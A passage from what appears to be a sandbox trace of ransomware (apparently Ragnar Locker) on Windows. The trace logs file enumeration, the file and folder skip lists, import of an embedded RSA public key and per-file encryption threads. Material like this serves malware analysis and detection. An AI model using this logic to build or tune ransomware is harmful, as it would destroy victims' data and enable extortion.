cAlternateFileName="")) returned 1 [0171.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0171.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0171.531] FindNextFileW (in: hFindFile=0x3547b00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0171.531] FindClose (in: hFindFile=0x3547b00 | out: hFindFile=0x3547b00) returned 1 [0171.532] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3548140 [0171.532] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3946b61, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf3946b61, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.534] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3943112, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf3943112, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0171.534] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0171.534] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0171.534] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1032\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0171.534] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0171.534] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0171.534] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0171.534] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0171.534] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf") returned=".rtf" [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0171.534] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0171.535] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0171.535] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0171.535] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0171.535] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0171.535] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0171.535] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0171.535] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0171.535] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0171.535] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0171.535] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0171.535] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0171.535] GetProcessHeap () returned 0x3520000 [0171.535] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0171.537] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" [0171.537] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0171.537] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0171.537] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0171.537] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned=".xml" [0171.537] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0171.537] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0171.537] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0171.537] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0171.537] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0171.537] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0171.537] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0171.537] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0171.538] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0171.538] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0171.538] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0171.538] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0171.538] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0171.538] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0171.538] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0171.538] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0171.538] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0171.538] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0171.538] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0171.538] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0171.538] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0171.538] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0171.538] GetProcessHeap () returned 0x3520000 [0171.538] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0171.540] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" [0171.540] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0171.540] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0171.540] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0171.540] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned=".dll" [0171.540] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0171.540] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0171.540] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0171.540] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0171.540] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0171.540] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0171.540] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0171.540] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0171.541] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0171.541] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0171.541] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0171.541] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0171.541] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0171.541] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0171.541] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0171.541] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0171.541] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0171.541] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0171.541] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0171.541] GetProcessHeap () returned 0x3520000 [0171.541] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586800 [0171.541] CryptAcquireContextW (in: phProv=0x3586800, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586800*=0x35567f8) returned 1 [0171.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0171.542] GetProcessHeap () returned 0x3520000 [0171.542] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x35cd380 [0171.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x35cd380, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0171.542] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0171.542] GetProcessHeap () returned 0x3520000 [0171.543] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35948f0 [0171.543] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35948f0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35948f0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0171.543] GetProcessHeap () returned 0x3520000 [0171.543] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cd380 | out: hHeap=0x3520000) returned 1 [0171.543] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35948f0, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0171.543] CryptImportPublicKeyInfo (in: hCryptProv=0x35567f8, dwCertEncodingType=0x1, pInfo=0x357fc90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x357fcc0*, PublicKey.cbData=0x10e, PublicKey.pbData=0x357fcc8*, PublicKey.cUnusedBits=0x0), phKey=0x3586804 | out: phKey=0x3586804*=0x3548180) returned 1 [0171.543] GetProcessHeap () returned 0x3520000 [0171.543] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35948f0 | out: hHeap=0x3520000) returned 1 [0171.543] LocalFree (hMem=0x357fc90) returned 0x0 [0171.544] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556b28) returned 1 [0171.544] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0171.544] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0171.544] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0171.548] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35564c8) returned 1 [0171.548] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0171.548] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0171.548] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0171.551] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556bb0) returned 1 [0171.552] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0171.552] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0171.552] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0171.556] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3557188) returned 1 [0171.556] CryptGenRandom (in: hProv=0x3557188, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0171.556] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0171.556] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0171.560] CryptEncrypt (in: hKey=0x3548180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0171.561] GetLastError () returned 0x80090016 [0171.561] CryptEncrypt (in: hKey=0x3548180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0171.562] GetLastError () returned 0x80090016 [0171.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xf48) returned 0x3b4 [0171.563] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3557188) returned 1 [0171.563] CryptGenRandom (in: hProv=0x3557188, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0171.563] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0171.563] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0171.566] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3557188) returned 1 [0171.567] CryptGenRandom (in: hProv=0x3557188, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0171.567] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0171.567] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0171.571] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3557188) returned 1 [0171.571] CryptGenRandom (in: hProv=0x3557188, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0171.571] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0171.571] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0171.574] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35562a8) returned 1 [0171.575] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0171.575] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0171.575] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0171.579] CryptEncrypt (in: hKey=0x3548180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0171.579] GetLastError () returned 0x80090016 [0171.579] CryptEncrypt (in: hKey=0x3548180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0171.580] GetLastError () returned 0x80090016 [0171.580] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x136c) returned 0x3f0 [0171.581] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0172.272] GetProcessHeap () returned 0x3520000 [0172.272] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586800 | out: hHeap=0x3520000) returned 1 [0172.273] CloseHandle (hObject=0x3b4) returned 1 [0172.273] GetProcessHeap () returned 0x3520000 [0172.273] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0172.275] CloseHandle (hObject=0x3f0) returned 1 [0172.275] GetProcessHeap () returned 0x3520000 [0172.275] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0172.276] FindClose (in: hFindFile=0x3548140 | out: hFindFile=0x3548140) returned 1 [0172.277] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0172.277] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="Windows.old") returned -1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="Tor browser") returned -1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="Internet Explorer") returned -1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="Google") returned -1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="Opera") returned -1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="Opera Software") returned -1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="Mozilla") returned -1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="Mozilla Firefox") returned -1 [0172.277] lstrcmpiW (lpString1="1033", lpString2="$Recycle.Bin") returned 1 [0172.278] lstrcmpiW (lpString1="1033", lpString2="ProgramData") returned -1 [0172.278] lstrcmpiW (lpString1="1033", lpString2="All Users") returned -1 [0172.278] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0172.278] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1033" | out: lpString1="1033") returned="1033" [0172.278] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\" [0172.278] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1033\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\" [0172.278] lstrcatW (in: 